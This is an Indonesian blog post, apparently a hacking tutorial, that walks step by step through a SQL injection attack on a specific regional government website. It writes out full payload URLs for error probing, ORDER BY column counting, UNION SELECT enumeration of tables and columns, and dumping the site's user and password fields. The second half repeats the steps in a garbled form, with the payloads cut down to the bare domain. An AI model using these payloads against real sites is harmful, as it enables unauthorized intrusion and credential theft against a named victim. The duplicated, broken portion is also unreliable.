sekarang saya akan memberikan salah-satu cara step by step SQL Injection pada salah satu website. Hanya dengan maksut memberikan pembelajaran kepada teman-teman saja.. saya bukan heckel atau creckel.. saya hanya manusia biasa yang mencoba terus belajar dan belajar..
langsung saja pada Link dibawah ini:
http://paniaikab.go.id/
step 1
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=1 '
coba dengan memasukan tanda petik jika terjadi syntaq errore maka terjadi vulnerability
contoh "pagingquery gagal You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' limit 0,2' at line 2"
step 2 = Untuk mencari column gunakan perintah order by. order by 1-- , order by 2-- dst. sampai muncul pesan errore
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 1--
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 2--
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 3--
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 4--
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 5--
step 3 = untuk mencari angka yang dimana untuk kita lakukan di langkah selanjutnya..
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,2,3,4--
step 4 = untuk mencari tahu versi sql nya.. disini versi 5x. kalau kalian menemukan versi 4x. cari aja yang lain,,
coba dengan memasukan tanda petik jika terjadi syntaq errore maka terjadi vulnerability
contoh "pagingquery gagal You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' limit 0,2' at line 2"
step 2 = Untuk mencari column gunakan perintah order by. order by 1-- , order by 2-- dst. sampai muncul pesan errore
http://paniaikab.go.id/
http://paniaikab.go.id/
http://paniaikab.go.id/
http://paniaikab.go.id/
http://paniaikab.go.id/
step 3 = untuk mencari angka yang dimana untuk kita lakukan di langkah selanjutnya..
http://paniaikab.go.id/
step 4 = untuk mencari tahu versi sql nya.. disini versi 5x. kalau kalian menemukan versi 4x. cari aja yang lain,,
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select version(),2,3,4,--
step5
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
step6 = 0x6D656E7561646D696E adalah Hex dari string menuadmin
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x6D656E7561646D696E--
step7
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1+union+all+select+1%2Cgroup_concat%28menu%2C0x3a%29%2C3%2C4+from+menuadmin
step8 = 0x75736572 adalah Hex dari string user
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x75736572--
step9
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(user,password),3,4 from user--
untuk keterangan lebih detail di setiap step-stepnya bisa hubungi pihak google.. haha
masa di suapin mulu,,, ya agak belajar sendiri dong... hehe
belajar terus kawan...
step5
http://paniaikab.go.id/
step6 = 0x6D656E7561646D6
http://paniaikab.go.id/
step7
http://paniaikab.go.id/
step8 = 0x75736572 adalah Hex dari string user
http://paniaikab.go.id/
step9
http://paniaikab.go.id/
untuk keterangan lebih detail di setiap step-stepnya bisa hubungi pihak google.. haha
masa di suapin mulu,,, ya agak belajar sendiri dong... hehe
belajar terus kawan...
{ 1 komentar... read them below or add one }
sip
Posting Komentar